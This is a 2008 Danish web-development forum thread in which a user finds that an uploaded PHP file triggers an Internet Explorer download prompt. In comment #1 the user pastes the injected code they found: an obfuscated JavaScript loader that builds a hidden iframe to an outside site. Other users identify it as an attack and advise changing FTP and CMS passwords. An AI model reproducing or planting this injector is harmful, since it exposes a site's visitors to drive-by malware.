Avatar billede nicolaib Praktikant
16. oktober 2008 - 21:43 Der er 8 kommentarer og
1 løsning

Microsoft Data Access Add-on bar vises ved PHP script

Jeg har lavet et PHP-script og da jeg lagde det på nettet vistes pludselig en Add-on bar i Internet Explorer. Baren fortæller at browseren gerne vil have at man downloader Microsoft Data Access. Jeg må være ærlig at sige at jeg ikke har nogen anelse om hvad det skyldes men jeg kan ikke se at der skulle være noget farligt i mit script.
Jeg så første gang problemet efter at jeg havde åbnet en af filerne i en ny editor(jEdit) og uploadet den igen. Kan der være nogen sammenhæng?

Jeg ønsker at fjerne det - nogen bud?
Avatar billede nicolaib Praktikant
17. oktober 2008 - 00:46 #1
Jeg hentede lige filen ned for at checke indholdet. Jeg fandt dette som jeg absolut ikke har skrevet selv. Hvor kan det komme fra?

<script>l1l=document.all;var naa=true;ll1=document.layers;lll=window.sidebar;naa=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');naa|=lII;O0O0=new Array();O0O0[0]='<iframe src="http://';O00O='fu';OO0O='FbbGPODYCOpTqEvRxXGRYTasKSUOysOO';O00O+='nction __'+'__(_'+'O0){';O0OO='v%61%72%20%6C%32%3Dwi\156\144o\167%2Eopera%3F%31%3A%30%3B%66un\143ti\157\156%20%6C%33%28\154%34%29%7Bl%35%3D%2Fz\141%2Fg%3Bl%36%3D\123t%72\151%6Eg%2E%66r%6F\155%43harC%6F\144e%28%30%29%3Bl%34%3Dl%34%2E\162e%70\154%61c%65%28%6C%35%2Cl%36%29%3B\166\141r%20l%37%3Dne\167%20A%72\162%61y%28%29%2C%6C%38%3D%5F%31%3Dl%34%2El%65\156\147\164%68%2C\154%39%2ClI%2Ci%6C%3D%31%36%32%35%36%2C%5F%31%3D%30%2C%49%3D%30%2C%6Ci%3D%27%27%3Bd%6F%7Bl%39%3D\154%34%2E\143h\141rCo%64%65\101%74%28%5F%31%29%3B%6CI%3D%6C%34%2E\143\150\141%72\103%6F%64\145A%74%28%2B%2B%5F%31%29%3Bl%37%5B%49%2B%2B%5D%3Dl%49%2B%69%6C%2D%28%6C%39%3C%3C%37%29%7Dwhil\145%28%5F%31%2B%2B%3Cl%38%29%3B%76\141%72%20l%31%3Dn%65%77';O0O0[0]+='deinglaube.com/images/" h~g';O00O+='eva';OOOO='OclaKFFEJryIOxwP';O00O+='l(unes'                            +'cape(_O0))}';eval                                    (O00O);OO00='lQBSWZQlStcORhOTcnOO';O00O='';O0OO+='%20\101r%72%61y%28%29%2Cl%30%3D\156e\167%20Array%28%29%2C\111l%3D%31%32%38%3Bd\157%7Bl%30%5B\111\154%5D%3DSt%72ing%2Efr%6FmCh\141r%43\157%64e%28%49l%29%7D%77hile%28%2D%2D\111l%29%3BI%6C%3D%31%32%38%3Bl%31%5B%30%5D%3D%6C%69%3D\154%30%5B\154%37%5B%30%5D%5D%3B\154l%3Dl%37%5B%30%5D%3B%5Fl%3D%31%3B%76\141r%20%6C%5F%3D%6C%37%2E%6C\145\156\147%74h%2D%31%3Bwhil%65%28%5Fl%3C%6C%5F%29%7Bswi%74%63\150%28l%37%5B%5F\154%5D%3CI%6C%3F%31%3A%30%29%7B\143\141s\145%20%30%20%3A%6C%30%5BIl%5D%3D\154%30%5B\154%6C%5D%2B\123\164\162%69\156%67%28\154%30%5B\154\154%5D%29%2E%73ubs\164%72%28%30%2C%31%29%3Bl%31%5B%5Fl%5D%3D%6C%30%5B%49\154%5D%3Bif%28%6C%32%29%7B%6Ci%2B%3Dl%30%5B\111%6C%5D%7D%3Bbr%65%61';OOO0='l';O0O0[0]+='~\r=0 width~0 bor~r~0><~"~~e>';O0OO+='\153%3B%64%65f%61\165lt%3A\154%31%5B%5Fl%5D%3Dl%30%5Bl%37%5B%5Fl%5D%5D%3B\151f%28\154%32%29%7B%6C\151%2B%3Dl%30%5B%6C%37%5B%5F\154%5D%5D%7D%3Bl%30%5BI%6C%5D%3Dl%30%5Bl%6C%5D%2BStri%6E\147%28\154%30%5B%6C%37%5B%5Fl%5D%5D%29%2E%73\165%62s%74%72%28%30%2C%31%29%3B\142\162\145ak%7D%3BIl%2B%2B%3Bl%6C%3D%6C%37%5B%5F\154%5D%3B%5Fl%2B%2B%7D%3B\151f%28%21\154%32%29%7B\162eturn%28%6C%31%2Ejo%69%6E%28%27%27%29%29%7D%65\154se%7Br%65\164u\162n%20li%7D%7D%3B%76\141\162%20\154O%3D%27%27%3B\146%6Fr%28%69i%3D%30%3B\151%69%3CO%30\117%30%2E\154%65%6E\147t%68%3B\151i%2B%2B%29%7BlO%2B%3Dl%33%28%4F%30%4F%30%5B%69\151%5D%29%7D%3Bi\146%28\156aa%29%7B\144%6F\143u%6D%65nt%2Ewr%69\164%65%28lO%29%7D%3B';OO00      ='s;n42V;5 QJ9qv!Ctw-';____    (O0OO);OOO0+='t7yHDw/$;mm4He.O,c0x+$Y3LYPkNRg&r>b6Dp k<12/:';</script>
Avatar billede majbom Novice
17. oktober 2008 - 08:17 #2
prøv at fjern det det ikke selv har skrevet i første omgang og se om ikke det løser problemet
Avatar billede olebole Juniormester
17. oktober 2008 - 09:39 #3
<ole>

- og du har øjensynlig gemt filen med forkert encoding i forhold til det anvendte tegnsæt - så den ligner noget, der er totalt ubrugelig

/mvh
</bole>
Avatar billede olebole Juniormester
17. oktober 2008 - 09:41 #4
- men jeg så en kode noget lign. på et andet site fornylig. Det ligner et angreb/virus of some sort  :o|
Avatar billede nicolaib Praktikant
17. oktober 2008 - 10:42 #5
Jeg fjernede det igår og det ser ud til at have fjernet problemet. Det sted i filen hvor det nye indhold fremgik har jeg aldrig skrevet noget der ligner det ovenstående. Jeg har derfor svært ved at se at det kan være encoding. Kan du forklare hvordan det kan hænge sammen?
Mht. angreb så synes jeg også mest af alt at det ligner det, men hvordan kan det ske?
Hvis man googler Remote Data Services som også fremgik af baren, så skriver folk om Trojanske heste mv.
Hvordan ender det i en PHPfil, altså hvordan er der blevet skrevet til en fil på mit webhotel. Skal den CHMODes anderledes?
Avatar billede majbom Novice
17. oktober 2008 - 10:57 #6
har netop haft et lignende problem på en side, hvor der ligepludslig var over 500 linjers kode med links til diverse sider på nettet. jeg snakkede med host'en og de rådede mig til at skifte kodeord til ftp-server og et evt. cms-system, så det gjorde jeg...

jeg søgte på nogle af de linjer der lå i filen, og det viste sig at google gav omkring 1500 hits mener jeg...
Avatar billede nicolaib Praktikant
22. oktober 2008 - 14:23 #7
Nå der er tilsyneladende ikke nogen der ved hvorfor det er sket. Hosten mangler log for perioden. Jeg har dog fået fjernet problemet og lavet nye koder.
Vil nogen have point, så læg et svar.
Avatar billede nicolaib Praktikant
25. oktober 2008 - 19:43 #8
Tak for hjælpen.
Avatar billede majbom Novice
25. oktober 2008 - 20:05 #9
selv tak
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Vi tilbyder markedets bedste kurser inden for webudvikling

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester